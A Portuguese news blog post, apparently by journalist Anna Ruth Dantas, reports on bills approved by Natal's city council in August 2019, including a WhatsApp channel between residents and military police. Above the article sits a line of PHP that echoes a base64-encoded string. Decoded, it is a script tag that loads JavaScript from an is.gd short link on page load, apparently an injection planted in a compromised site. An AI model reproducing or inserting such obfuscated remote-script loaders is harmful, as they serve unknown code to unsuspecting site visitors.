$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Vereadores de Natal aprovam “Programa Vizinhança Solidária Cidadã”

Vereadores de Natal aprovam “Programa Vizinhança Solidária Cidadã”
23 Ago 2019

Em segunda discussão, a Câmara Municipal de Natal aprovou, nesta quinta-feira (22), o Projeto de Lei n°165/2018 apresentado pelo vereador Chagas Catarino (PDT) que cria o Programa Vizinhança Solidária Cidadã, que consiste em comunicação direta pelo aplicativo WhatsApp entre a Polícia Militar e a sociedade civil, representada por associações e conselhos comunitários, comerciantes e moradores.

“A iniciativa visa criar um canal mais rápido de comunicação com a Polícia Militar. Com isso, os moradores de bairros ou de ruas que tem grupos no aplicativo WhatsApp poderão se comunicar rapidamente com a polícia, reduzindo assim os crimes e delitos, agilizando a averiguação de pessoas suspeitas. Tenho certeza que vai contribuir para a segurança das comunidades”, defendeu o vereador Chagas Catarino.

Na sequência, os parlamentares acataram, em primeira discussão, uma matéria encaminhada pelo vereador Ary Gomes (PDT) dispondo sobre o reconhecimento de Utilidade Pública do Instituto Norte-Rio-Grandense de Desenvolvimento Social. Trata-se de uma instituição que ajuda na implantação de políticas sociais, econômicas e de combate à pobreza, além de incentivar a inclusão produtiva e o associativismo formal e informal. 

Com a intenção de cuidar da população animal da capital potiguar, foi acatada uma proposição do ex-vereador George Câmara, subscrita pelo vereador Franklin Capistrano (PSB) autorizando a criação do Fundo Municipal de Bem Estar Animal e Saúde Pública – FAN. Aprovada em primeira discussão, a proposta retornará na próxima sessão ordinária para segunda votação.

Por fim, o plenário deu parecer favorável, também em primeira discussão, ao texto de autoria do vereador Robson Carvalho (PMB) que institui no Calendário Oficial do Município a Campanha Fevereiro Laranja a ser realizada todo mês de fevereiro com o objetivo de conscientizar a população sobre a leucemia, ressaltando a importância da prevenção, do diagnóstico precoce, do conhecimento dos sintomas e dos tratamentos, em especial, a doação de sangue e medula óssea.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *